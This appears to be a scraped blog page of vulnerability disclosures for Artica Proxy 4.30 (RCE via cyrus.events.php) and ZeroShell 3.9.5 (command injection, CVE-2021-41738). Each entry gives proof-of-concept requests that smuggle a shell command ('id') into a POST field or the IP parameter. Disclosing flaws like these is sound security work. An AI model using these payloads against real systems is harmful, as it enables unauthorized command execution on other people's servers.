Headline
CVE-2021-41738: rootless – Medium
ZeroShell 3.9.5 has a command injection vulnerability in /cgi-bin/kerbynet IP parameter, which may allow an authenticated attacker to execute system commands.
Sep 26, 2021
Artica Proxy 4.30 cyrus.events.php RCE
Vendor && Product www.articatech.com Artica Web Proxy v4.30.000000 Download: http://www.articatech.com/download.php Reproduction Login the web account, use this poc Because the execution result is not echoed, we view the result by writing a file https://192.168.108.14:9000/cyrus.events.php?logs= POST: rp=;id>…/1.txt; access https://192.168.108.14:9000/1.txt, we can see the execution result.
Vulnerability
2 min read
Artica Proxy 4.30 cyrus.events.php RCE
Vendor && Product
www.articatech.com
Artica Web Proxy v4.30.000000
Download: http://www.articatech.com/download.php
Reproduction
Login the web account, use this poc
Because the execution result is not echoed, we view the result by writing a file
https://192.168.108.14:9000/cyrus.events.php?logs=
POST:
rp=;id>…/1.txt;
access https://192.168.108.14:9000/1.txt, we can see the execution result.
–
–
Sep 24, 2021
Zeroshell 3.9.5 Authenticated RCE
The latest version of ZeroShell (3.9.5) has a command injection vulnerability in /cgi-bin/kerbynet, attackers can execute os command through IP parameter. IP parameters are used in two places: POC: /cgi-bin/kerbynet?Section=Router&STk=<your STk>&Action=CheckIPARP&IP=;id /cgi-bin/kerbynet?Section=Router&STk=<your STk>&Action=CheckIPPING&IP=;id&PacketSize=
Vulnerability
1 min read
Zeroshell 3.9.5 Authenticated RCE
The latest version of ZeroShell (3.9.5) has a command injection vulnerability in /cgi-bin/kerbynet, attackers can execute os command through IP parameter.
IP parameters are used in two places:
POC:
/cgi-bin/kerbynet?Section=Router&STk=<your STk>&Action=CheckIPARP&IP=;id/cgi-bin/kerbynet?Section=Router&STk=<your STk>&Action=CheckIPPING&IP=;id&PacketSize=
–
–